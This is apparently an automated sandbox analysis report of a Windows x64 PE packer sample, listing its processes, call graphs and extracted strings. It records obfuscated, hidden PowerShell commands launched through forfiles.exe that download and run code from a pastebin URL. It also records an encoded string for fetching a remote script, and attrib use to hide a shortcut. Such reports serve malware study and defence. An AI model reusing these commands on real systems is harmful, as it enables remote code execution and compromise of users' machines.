                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                                        Imagebase:0x7ff7cac60000
                                                                                        File size:23'040 bytes
                                                                                        MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:9
                                                                                        Start time:09:54:28
                                                                                        Start date:15/10/2024
                                                                                        Path:C:\Windows\System32\forfiles.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                                        Imagebase:0x7ff7d53d0000
                                                                                        File size:52'224 bytes
                                                                                        MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:10
                                                                                        Start time:09:54:28
                                                                                        Start date:15/10/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff704000000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:11
                                                                                        Start time:09:54:28
                                                                                        Start date:15/10/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                                        Imagebase:0x7ff63c0a0000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:12
                                                                                        Start time:09:54:29
                                                                                        Start date:15/10/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                                        Imagebase:0x7ff63c0a0000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:13
                                                                                        Start time:09:54:35
                                                                                        Start date:15/10/2024
                                                                                        Path:C:\Windows\System32\forfiles.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                                        Imagebase:0x7ff7d53d0000
                                                                                        File size:52'224 bytes
                                                                                        MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:14
                                                                                        Start time:09:54:35
                                                                                        Start date:15/10/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff704000000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:15
                                                                                        Start time:09:54:36
                                                                                        Start date:15/10/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                                        Imagebase:0x7ff63c0a0000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:16
                                                                                        Start time:09:54:36
                                                                                        Start date:15/10/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                                        Imagebase:0x7ff7207d0000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:4.7%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:47.7%
                                                                                          Total number of Nodes:237
                                                                                          Total number of Limit Nodes:4
                                                                                          execution_graph 1981 7ff674c51ce8 1985 7ff674c52514 SetUnhandledExceptionFilter 1981->1985 1986 7ff674c51e32 1987 7ff674c524c0 GetModuleHandleW 1986->1987 1988 7ff674c51e39 1987->1988 1989 7ff674c51e3d 1988->1989 1990 7ff674c51e78 _exit 1988->1990 1932 7ff674c57dd0 1933 7ff674c57de0 1932->1933 1935 7ff674c57e66 1933->1935 1936 7ff674c58a30 1933->1936 1937 7ff674c58a41 1936->1937 1938 7ff674c58af8 1937->1938 1939 7ff674c58ad2 memmove 1937->1939 1938->1933 1939->1938 1940 7ff674c52c90 1941 7ff674c52c99 1940->1941 1942 7ff674c52ca0 malloc 1940->1942 1941->1942 1943 7ff674c58050 1944 7ff674c58060 1943->1944 1945 7ff674c58a30 memmove 1944->1945 1946 7ff674c58110 1944->1946 1945->1944 1991 7ff674c530f0 strncmp 1992 7ff674c5311a 1991->1992 1993 7ff674c57cf0 1994 7ff674c57d0d 1993->1994 1998 7ff674c57d36 1993->1998 1995 7ff674c57d29 1994->1995 1996 7ff674c58a30 memmove 1994->1996 1996->1995 1997 7ff674c57db9 1998->1997 1999 7ff674c58a30 memmove 1998->1999 1999->1997 2000 7ff674c52cb0 2001 7ff674c52cb9 2000->2001 2002 7ff674c52cc0 free 2000->2002 2001->2002 2003 7ff674c51070 2004 7ff674c5108d realloc memmove 2003->2004 2005 7ff674c510c3 2003->2005 2004->2005 2006 7ff674c59396 _seh_filter_exe 1735 7ff674c51d04 1736 7ff674c51d1d 1735->1736 1737 7ff674c51e5b 1736->1737 1738 7ff674c51d25 __scrt_acquire_startup_lock 1736->1738 1843 7ff674c52370 IsProcessorFeaturePresent 1737->1843 1740 7ff674c51e65 1738->1740 1745 7ff674c51d43 __scrt_release_startup_lock 1738->1745 1741 7ff674c52370 9 API calls 1740->1741 1742 7ff674c51e70 1741->1742 1744 7ff674c51e78 _exit 1742->1744 1743 7ff674c51d68 1745->1743 1746 7ff674c51dee _get_initial_narrow_environment __p___argv __p___argc 1745->1746 1749 7ff674c51de6 _register_thread_local_exe_atexit_callback 1745->1749 1755 7ff674c51530 1746->1755 1749->1746 1752 7ff674c51e1b 1753 7ff674c51e25 1752->1753 1754 7ff674c51e20 _cexit 1752->1754 1753->1743 1754->1753 1756 7ff674c51590 1755->1756 1756->1756 1757 7ff674c51619 malloc 1756->1757 1758 7ff674c51640 1757->1758 1758->1758 1759 7ff674c516e0 WinExec free strrchr 1758->1759 1760 7ff674c51707 1759->1760 1761 7ff674c51714 1760->1761 1767 7ff674c5173b 1760->1767 1849 7ff674c513f0 __acrt_iob_func 1761->1849 1763 7ff674c51723 1766 7ff674c513f0 printf 2 API calls 1763->1766 1764 7ff674c513f0 printf 2 API calls 1765 7ff674c51763 1764->1765 1769 7ff674c513f0 printf 2 API calls 1765->1769 1768 7ff674c5172f 1766->1768 1767->1764 1767->1765 1771 7ff674c513f0 printf 2 API calls 1768->1771 1770 7ff674c517b7 CreateFileA 1769->1770 1772 7ff674c517eb GetLastError 1770->1772 1773 7ff674c5180c GetFileSize malloc 1770->1773 1775 7ff674c51807 1771->1775 1774 7ff674c513f0 printf 2 API calls 1772->1774 1776 7ff674c59247 1773->1776 1774->1775 1897 7ff674c51c00 1775->1897 1777 7ff674c51831 ReadFile 1776->1777 1779 7ff674c51852 GetLastError 1777->1779 1780 7ff674c51873 CloseHandle 1777->1780 1782 7ff674c513f0 printf 2 API calls 1779->1782 1780->1775 1783 7ff674c51889 1780->1783 1782->1775 1783->1775 1852 7ff674c514b0 1783->1852 1785 7ff674c51899 1785->1775 1786 7ff674c514b0 2 API calls 1785->1786 1787 7ff674c518aa 1786->1787 1787->1768 1787->1775 1788 7ff674c513f0 printf 2 API calls 1787->1788 1789 7ff674c518c8 1788->1789 1790 7ff674c518cd 1789->1790 1791 7ff674c51948 1789->1791 1792 7ff674c513f0 printf 2 API calls 1790->1792 1793 7ff674c51a0e 1791->1793 1794 7ff674c51951 1791->1794 1795 7ff674c518d9 1792->1795 1796 7ff674c513f0 printf 2 API calls 1793->1796 1797 7ff674c51956 1794->1797 1798 7ff674c519b2 1794->1798 1864 7ff674c51450 1795->1864 1802 7ff674c51a2b CreateFileA 1796->1802 1799 7ff674c513f0 printf 2 API calls 1797->1799 1800 7ff674c513f0 printf 2 API calls 1798->1800 1803 7ff674c51962 1799->1803 1804 7ff674c519be 1800->1804 1802->1775 1806 7ff674c51a66 1802->1806 1807 7ff674c51450 __stdio_common_vsprintf 1803->1807 1808 7ff674c51450 __stdio_common_vsprintf 1804->1808 1805 7ff674c51906 CopyFileA 1805->1793 1811 7ff674c51925 GetLastError 1805->1811 1810 7ff674c513f0 printf 2 API calls 1806->1810 1807->1805 1808->1793 1812 7ff674c51a72 1810->1812 1814 7ff674c513f0 printf 2 API calls 1811->1814 1813 7ff674c513f0 printf 2 API calls 1812->1813 1815 7ff674c51a7e 1813->1815 1816 7ff674c51941 1814->1816 1867 7ff674c52960 malloc memset 1815->1867 1816->1775 1818 7ff674c51a86 1819 7ff674c51b16 1818->1819 1869 7ff674c52a60 1818->1869 1875 7ff674c52a10 1819->1875 1823 7ff674c51b20 1826 7ff674c513f0 printf 2 API calls 1823->1826 1824 7ff674c51b06 1824->1819 1828 7ff674c51b10 free 1824->1828 1825 7ff674c51b32 1827 7ff674c52a10 free 1825->1827 1826->1816 1829 7ff674c51b3c 1827->1829 1828->1819 1830 7ff674c513f0 printf 2 API calls 1829->1830 1831 7ff674c51b4d 1830->1831 1832 7ff674c513f0 printf 2 API calls 1831->1832 1833 7ff674c51b65 1832->1833 1834 7ff674c513f0 printf 2 API calls 1833->1834 1835 7ff674c51b74 1834->1835 1879 7ff674c510e0 1835->1879 1838 7ff674c51b87 1838->1768 1839 7ff674c51b90 1840 7ff674c513f0 printf 2 API calls 1839->1840 1840->1816 1841 7ff674c524c0 GetModuleHandleW 1842 7ff674c51e17 1841->1842 1842->1742 1842->1752 1844 7ff674c52396 1843->1844 1845 7ff674c523a4 memset RtlCaptureContext RtlLookupFunctionEntry 1844->1845 1846 7ff674c5241a memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 1845->1846 1847 7ff674c523de RtlVirtualUnwind 1845->1847 1848 7ff674c5249a 1846->1848 1847->1846 1848->1740 1906 7ff674c513e0 1849->1906 1851 7ff674c51426 __stdio_common_vfprintf 1851->1763 1853 7ff674c514dc 1852->1853 1854 7ff674c514c6 1852->1854 1855 7ff674c51519 1853->1855 1857 7ff674c514ef 1853->1857 1860 7ff674c51503 1853->1860 1856 7ff674c513f0 printf 2 API calls 1854->1856 1858 7ff674c513f0 printf 2 API calls 1855->1858 1859 7ff674c514d2 1856->1859 1857->1785 1861 7ff674c51525 1858->1861 1859->1785 1862 7ff674c513f0 printf 2 API calls 1860->1862 1861->1785 1863 7ff674c5150f 1862->1863 1863->1785 1907 7ff674c513e0 1864->1907 1866 7ff674c51476 __stdio_common_vsprintf 1866->1805 1868 7ff674c5298c 1867->1868 1868->1818 1870 7ff674c52a95 1869->1870 1874 7ff674c51b00 1870->1874 1908 7ff674c56ce0 1870->1908 1872 7ff674c52b1a 1872->1874 1912 7ff674c56ed0 1872->1912 1874->1824 1874->1825 1876 7ff674c52a51 1875->1876 1878 7ff674c52a1e 1875->1878 1876->1823 1877 7ff674c52a3b free 1877->1823 1878->1876 1878->1877 1880 7ff674c51138 GetFileSize 1879->1880 1881 7ff674c513ad 1879->1881 1882 7ff674c5115c CreateFileMappingW MapViewOfFile 1880->1882 1883 7ff674c513a2 CloseHandle 1880->1883 1884 7ff674c51c00 8 API calls 1881->1884 1885 7ff674c511c7 1882->1885 1886 7ff674c511b3 CloseHandle 1882->1886 1883->1881 1887 7ff674c513cf 1884->1887 1885->1883 1888 7ff674c511d0 UnmapViewOfFile 1885->1888 1886->1885 1887->1838 1887->1839 1889 7ff674c511e2 CloseHandle 1888->1889 1890 7ff674c511ef CreateFileMappingW MapViewOfFile 1888->1890 1889->1890 1891 7ff674c51264 1890->1891 1892 7ff674c51250 CloseHandle 1890->1892 1891->1883 1893 7ff674c5126d 1891->1893 1892->1891 1893->1893 1894 7ff674c512e9 memmove memmove UnmapViewOfFile 1893->1894 1895 7ff674c5138a CloseHandle 1894->1895 1896 7ff674c51397 CloseHandle 1894->1896 1895->1896 1896->1881 1898 7ff674c51c09 1897->1898 1899 7ff674c51bc0 1898->1899 1900 7ff674c51ec8 IsProcessorFeaturePresent 1898->1900 1899->1841 1901 7ff674c51ee0 1900->1901 1927 7ff674c51f9c RtlCaptureContext 1901->1927 1906->1851 1907->1866 1909 7ff674c56ced 1908->1909 1910 7ff674c56d91 memset 1909->1910 1911 7ff674c56db3 1909->1911 1910->1909 1911->1872 1913 7ff674c56eff 1912->1913 1917 7ff674c56f65 1913->1917 1918 7ff674c562b0 1913->1918 1915 7ff674c562b0 memmove 1916 7ff674c56f13 1915->1916 1916->1915 1916->1917 1917->1874 1920 7ff674c562d5 1918->1920 1921 7ff674c56394 1920->1921 1922 7ff674c53ac0 1920->1922 1921->1916 1923 7ff674c53aea 1922->1923 1926 7ff674c53b1c 1922->1926 1923->1920 1924 7ff674c543be memmove 1924->1926 1925 7ff674c53d9f 1925->1920 1926->1924 1926->1925 1928 7ff674c51fb6 RtlLookupFunctionEntry 1927->1928 1929 7ff674c51fcc RtlVirtualUnwind 1928->1929 1930 7ff674c51ef3 1928->1930 1929->1928 1929->1930 1931 7ff674c51e94 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 1930->1931 1955 7ff674c51e80 1958 7ff674c52250 1955->1958 1959 7ff674c51e89 1958->1959 1960 7ff674c52273 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 1958->1960 1960->1959 1961 7ff674c57e80 1962 7ff674c57e9d 1961->1962 1965 7ff674c57ec6 1961->1965 1963 7ff674c57eb9 1962->1963 1964 7ff674c58a30 memmove 1962->1964 1964->1963 1966 7ff674c57fcf 1965->1966 1969 7ff674c57f80 1965->1969 1967 7ff674c57fc8 1966->1967 1968 7ff674c58a30 memmove 1966->1968 1968->1967 1969->1967 1970 7ff674c58a30 memmove 1969->1970 1970->1967 2017 7ff674c51c20 2018 7ff674c51c30 2017->2018 2030 7ff674c52088 2018->2030 2020 7ff674c52370 9 API calls 2021 7ff674c51cd5 2020->2021 2022 7ff674c51c54 _RTC_Initialize 2027 7ff674c51cb7 2022->2027 2038 7ff674c52310 InitializeSListHead 2022->2038 2027->2020 2029 7ff674c51cc5 2027->2029 2031 7ff674c52099 2030->2031 2032 7ff674c520cb 2030->2032 2033 7ff674c52108 2031->2033 2036 7ff674c5209e __scrt_release_startup_lock 2031->2036 2032->2022 2034 7ff674c52370 9 API calls 2033->2034 2035 7ff674c52112 2034->2035 2036->2032 2037 7ff674c520bb _initialize_onexit_table 2036->2037 2037->2032

                                                                                          Callgraph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          • Opacity -> Relevance
                                                                                          • Disassembly available
                                                                                          callgraph 0 Function_00007FF674C52308 1 Function_00007FF674C52114 2 Function_00007FF674C52514 3 Function_00007FF674C53210 4 Function_00007FF674C55F10 5 Function_00007FF674C52A10 100 Function_00007FF674C56E50 5->100 6 Function_00007FF674C52D10 7 Function_00007FF674C52310 8 Function_00007FF674C52010 51 Function_00007FF674C528C4 8->51 9 Function_00007FF674C522FC 10 Function_00007FF674C521FC 11 Function_00007FF674C525F8 12 Function_00007FF674C51D04 12->1 12->8 23 Function_00007FF674C51530 12->23 42 Function_00007FF674C521D0 12->42 57 Function_00007FF674C524C0 12->57 83 Function_00007FF674C521AC 12->83 97 Function_00007FF674C5204C 12->97 113 Function_00007FF674C52370 12->113 114 Function_00007FF674C52358 12->114 118 Function_00007FF674C52360 12->118 13 Function_00007FF674C59304 14 Function_00007FF674C52300 15 Function_00007FF674C51C00 73 Function_00007FF674C51E94 15->73 90 Function_00007FF674C51F9C 15->90 16 Function_00007FF674C51000 17 Function_00007FF674C57C00 18 Function_00007FF674C58600 28 Function_00007FF674C58A30 18->28 109 Function_00007FF674C58940 18->109 19 Function_00007FF674C52D01 20 Function_00007FF674C52328 21 Function_00007FF674C51E32 21->57 22 Function_00007FF674C53430 23->5 23->15 52 Function_00007FF674C529C0 23->52 59 Function_00007FF674C513F0 23->59 66 Function_00007FF674C510E0 23->66 86 Function_00007FF674C514B0 23->86 99 Function_00007FF674C51450 23->99 115 Function_00007FF674C52960 23->115 117 Function_00007FF674C52A60 23->117 24 Function_00007FF674C57630 93 Function_00007FF674C576A0 24->93 25 Function_00007FF674C52330 25->20 67 Function_00007FF674C513E0 25->67 26 Function_00007FF674C53030 27 Function_00007FF674C58C30 82 Function_00007FF674C59080 28->82 29 Function_00007FF674C58F30 30 Function_00007FF674C52324 31 Function_00007FF674C52524 32 Function_00007FF674C58120 32->28 40 Function_00007FF674C59120 32->40 95 Function_00007FF674C584A0 32->95 33 Function_00007FF674C57520 45 Function_00007FF674C55FD0 33->45 34 Function_00007FF674C55720 35 Function_00007FF674C53320 36 Function_00007FF674C57820 36->93 37 Function_00007FF674C55E20 37->93 38 Function_00007FF674C52320 39 Function_00007FF674C51C20 39->0 39->7 39->9 39->14 39->25 39->30 39->38 72 Function_00007FF674C52088 39->72 78 Function_00007FF674C52580 39->78 96 Function_00007FF674C5234C 39->96 106 Function_00007FF674C52238 39->106 39->113 41 Function_00007FF674C531D2 42->38 43 Function_00007FF674C52CD0 44 Function_00007FF674C55DD0 60 Function_00007FF674C55BF0 44->60 46 Function_00007FF674C528D0 47 Function_00007FF674C554D0 48 Function_00007FF674C56ED0 53 Function_00007FF674C560C0 48->53 88 Function_00007FF674C562B0 48->88 49 Function_00007FF674C57DD0 49->28 49->40 50 Function_00007FF674C525BC 68 Function_00007FF674C52FE0 52->68 53->27 79 Function_00007FF674C56F80 53->79 107 Function_00007FF674C57440 53->107 108 Function_00007FF674C58E40 53->108 54 Function_00007FF674C539C0 85 Function_00007FF674C579B0 54->85 54->93 55 Function_00007FF674C55EC0 56 Function_00007FF674C53AC0 56->3 56->4 56->47 56->55 70 Function_00007FF674C578E0 56->70 58 Function_00007FF674C51CE8 58->2 58->9 59->67 61 Function_00007FF674C528F0 89 Function_00007FF674C57CB0 61->89 62 Function_00007FF674C52EF0 63 Function_00007FF674C530F0 64 Function_00007FF674C57CF0 64->28 64->95 65 Function_00007FF674C592E4 65->13 66->15 69 Function_00007FF674C56CE0 69->33 120 Function_00007FF674C58B60 69->120 71 Function_00007FF674C58EE0 72->51 72->113 74 Function_00007FF674C55190 74->70 75 Function_00007FF674C55F90 76 Function_00007FF674C52C90 77 Function_00007FF674C58390 77->28 77->40 79->34 80 Function_00007FF674C51E80 98 Function_00007FF674C52250 80->98 81 Function_00007FF674C57E80 81->28 81->40 81->95 83->51 84 Function_00007FF674C593B4 85->44 85->93 116 Function_00007FF674C57760 85->116 86->59 87 Function_00007FF674C52CB0 88->22 88->24 88->35 88->36 88->37 88->44 88->54 88->56 88->70 88->74 88->93 94 Function_00007FF674C555A0 88->94 88->116 91 Function_00007FF674C59396 92 Function_00007FF674C521A5 94->93 97->11 97->38 99->67 100->71 101 Function_00007FF674C52950 102 Function_00007FF674C52D50 103 Function_00007FF674C58050 103->28 103->40 104 Function_00007FF674C58850 104->28 105 Function_00007FF674C58F50 106->10 107->22 107->35 107->44 110 Function_00007FF674C58F40 111 Function_00007FF674C52368 112 Function_00007FF674C51070 113->111 115->6 115->43 115->75 116->93 117->17 117->33 117->48 117->69 119 Function_00007FF674C53160 121 Function_00007FF674C58F60

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 7ff674c51530-7ff674c5158c 1 7ff674c51590-7ff674c51596 0->1 2 7ff674c51598-7ff674c515b0 1->2 3 7ff674c515b2-7ff674c515b8 1->3 4 7ff674c515d7-7ff674c515ee 2->4 3->4 5 7ff674c515ba-7ff674c515d3 3->5 4->1 6 7ff674c515f0-7ff674c51609 4->6 5->4 7 7ff674c51610-7ff674c51617 6->7 7->7 8 7ff674c51619-7ff674c51635 malloc 7->8 9 7ff674c51640-7ff674c5164c 8->9 9->9 10 7ff674c5164e 9->10 11 7ff674c51652-7ff674c5165a 10->11 11->11 12 7ff674c5165c-7ff674c5167d 11->12 13 7ff674c51680-7ff674c51688 12->13 13->13 14 7ff674c5168a-7ff674c516ac 13->14 15 7ff674c516b0-7ff674c516b8 14->15 15->15 16 7ff674c516ba-7ff674c516c7 15->16 17 7ff674c516d0-7ff674c516de 16->17 17->17 18 7ff674c516e0-7ff674c51705 WinExec free strrchr 17->18 19 7ff674c5170c 18->19 20 7ff674c51707-7ff674c5170a 18->20 21 7ff674c5170f-7ff674c51712 19->21 20->21 22 7ff674c5173b 21->22 23 7ff674c51714-7ff674c5172a call 7ff674c513f0 * 2 21->23 25 7ff674c5177a 22->25 26 7ff674c5173d-7ff674c51744 22->26 40 7ff674c5172f-7ff674c51736 23->40 27 7ff674c5177d-7ff674c51780 25->27 29 7ff674c51746-7ff674c5174a 26->29 30 7ff674c5176e-7ff674c51775 call 7ff674c513f0 26->30 32 7ff674c517a7-7ff674c517e9 call 7ff674c513f0 CreateFileA 27->32 33 7ff674c51782-7ff674c5178c 27->33 35 7ff674c5174c-7ff674c51750 29->35 36 7ff674c51752-7ff674c51755 29->36 30->25 48 7ff674c517eb-7ff674c51807 GetLastError call 7ff674c513f0 32->48 49 7ff674c5180c-7ff674c51850 GetFileSize malloc call 7ff674c59247 ReadFile 32->49 38 7ff674c5178e-7ff674c51795 33->38 39 7ff674c517a1-7ff674c517a3 33->39 35->25 35->36 36->30 37 7ff674c51757-7ff674c5175b 36->37 37->30 42 7ff674c5175d-7ff674c51761 37->42 38->39 43 7ff674c51797-7ff674c5179f 38->43 39->32 44 7ff674c51ba7 call 7ff674c513f0 40->44 42->30 47 7ff674c51763-7ff674c5176c 42->47 43->39 51 7ff674c51bac 44->51 47->27 48->51 57 7ff674c51852-7ff674c5186e GetLastError call 7ff674c513f0 49->57 58 7ff674c51873-7ff674c51883 CloseHandle 49->58 54 7ff674c51bb1-7ff674c51be0 call 7ff674c51c00 51->54 57->51 58->51 61 7ff674c51889-7ff674c5188b 58->61 61->51 63 7ff674c51891-7ff674c5189c call 7ff674c514b0 61->63 63->51 66 7ff674c518a2-7ff674c518ad call 7ff674c514b0 63->66 69 7ff674c518b3-7ff674c518b6 66->69 70 7ff674c51ba0 66->70 69->51 71 7ff674c518bc-7ff674c518cb call 7ff674c513f0 69->71 70->44 74 7ff674c518cd-7ff674c51906 call 7ff674c513f0 call 7ff674c51450 71->74 75 7ff674c51948-7ff674c5194b 71->75 93 7ff674c5190d-7ff674c5191f CopyFileA 74->93 77 7ff674c51a1a-7ff674c51a60 call 7ff674c513f0 CreateFileA 75->77 78 7ff674c51951-7ff674c51954 75->78 77->51 90 7ff674c51a66-7ff674c51ab9 call 7ff674c513f0 * 2 call 7ff674c52960 call 7ff674c529c0 77->90 81 7ff674c51956-7ff674c519ad call 7ff674c513f0 call 7ff674c51450 78->81 82 7ff674c519b2-7ff674c51a0e call 7ff674c513f0 call 7ff674c51450 78->82 81->93 82->77 107 7ff674c51abb-7ff674c51b04 call 7ff674c52a60 90->107 108 7ff674c51b16-7ff674c51b30 call 7ff674c52a10 call 7ff674c513f0 90->108 93->77 97 7ff674c51925-7ff674c51943 GetLastError call 7ff674c513f0 93->97 97->54 113 7ff674c51b06-7ff674c51b0e 107->113 114 7ff674c51b32-7ff674c51b85 call 7ff674c52a10 call 7ff674c513f0 * 3 call 7ff674c510e0 107->114 108->54 113->108 117 7ff674c51b10 free 113->117 128 7ff674c51b87-7ff674c51b8e 114->128 129 7ff674c51b90-7ff674c51b9e call 7ff674c513f0 114->129 117->108 128->44 129->54
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2322250521.00007FF674C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674C50000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2322205653.00007FF674C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322278453.00007FF674C5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322300128.00007FF674C5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff674c50000_OSLdZanXNc.jbxd
                                                                                          Similarity
                                                                                          • API ID: printf$File$ErrorLastmalloc$Createfree$CloseCopyExecHandleReadSize__acrt_iob_func__stdio_common_vfprintfmemsetstrrchr
                                                                                          • String ID: [ DONE ] $%s%s$.\DllPP64Stub.dll$.\H_PP64Stub.exe$.\unpacker.exe$CopyFileA$CreateFileA$DllPP64Stub.dll$H_PP64Stub.exe$ReadFile$[!] Compression Failed With Error : %d $[!] "%s" [ FAILED ] %d $[!] Failed To Create A New Section $[#] Output : $[#] Usage : %s <Input x64 exe> <*Output*>$[+] Compressed Ratio : %d%% $[+] Final Pe Size : %d $[+] Section .ATOM is Created Containing The Input Packed Pe $[i] "%s" Is Invalid Input, Defaulting To Outputting Exe File ... $[i] 32-PE Input Detected ... [ NOT-SUPPORTED ]$[i] 64-PE Input Detected ... [ SUPPORTED ]$[i] Generating Dll Output ... $[i] Generating Exe Output ... $[i] Generating No Console Exe Output ... $[i] Packing ... $[i] Reading " %s " ... $[i] Reading The Loader "%s" ...$hell.e$hoo -zlqgrzvwboh k -dujv {lha(lzu udz.jlwkxexvhufrqwhqw.frp/Qhwk3Q/qd9rz3495udbjzl4jbukxdzhudzhud/uhiv/khdgv/pdlq/fu_dvp_fubswhu.waw -xvhedvlfsduvlqj)}$powers$stublocation\$unpacker.exe
                                                                                          • API String ID: 2980077734-226719752
                                                                                          • Opcode ID: d4229d7a5b8b2fd300928cd97432b2d28f53d1bd187f2e038fd3ea97fb56186e
                                                                                          • Instruction ID: c1c55b191a348592d2d392dcaf49088790348aff03ea886a6ba7f275518ad402
                                                                                          • Opcode Fuzzy Hash: d4229d7a5b8b2fd300928cd97432b2d28f53d1bd187f2e038fd3ea97fb56186e
                                                                                          • Instruction Fuzzy Hash: B1127E23E28A82C5EB109B25A8DC2BDA7B0FB55794F684133D94EC26A5DF3DE5C5C700

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2322250521.00007FF674C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674C50000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2322205653.00007FF674C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322278453.00007FF674C5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322300128.00007FF674C5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff674c50000_OSLdZanXNc.jbxd
                                                                                          Similarity
                                                                                          • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                                                                                          • String ID:
                                                                                          • API String ID: 1133592946-0
